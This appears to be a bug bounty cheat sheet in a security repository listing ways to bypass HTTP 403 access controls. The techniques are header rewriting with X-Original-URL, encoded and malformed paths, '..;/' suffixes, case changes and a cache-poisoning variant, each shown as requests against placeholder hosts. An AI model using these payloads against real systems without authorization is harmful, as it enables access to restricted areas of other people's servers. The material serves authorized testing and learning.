AllAboutBugBounty/Bypass/Bypass 403.md
2022-06-15 17:38:42 +07:00

1.2 KiB
Raw Blame History

Bypass 403 (Forbidden)

  1. Using "X-Original-URL" header
GET /admin HTTP/1.1
Host: target.com

Try this to bypass

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
  1. Appending %2e after the first slash
http://target.com/admin => 403

Try this to bypass

http://target.com/%2e/admin => 200
  1. Try add dot (.) slash (/) and semicolon (;) in the URL
http://target.com/admin => 403

Try this to bypass

http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
  1. Add "..;/" after the directory name
http://target.com/admin

Try this to bypass

http://target.com/admin..;/
  1. Try to uppercase the alphabet in the url
http://target.com/admin

Try this to bypass

http://target.com/aDmIN
  1. Via Web Cache Poisoning
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin

Tools

References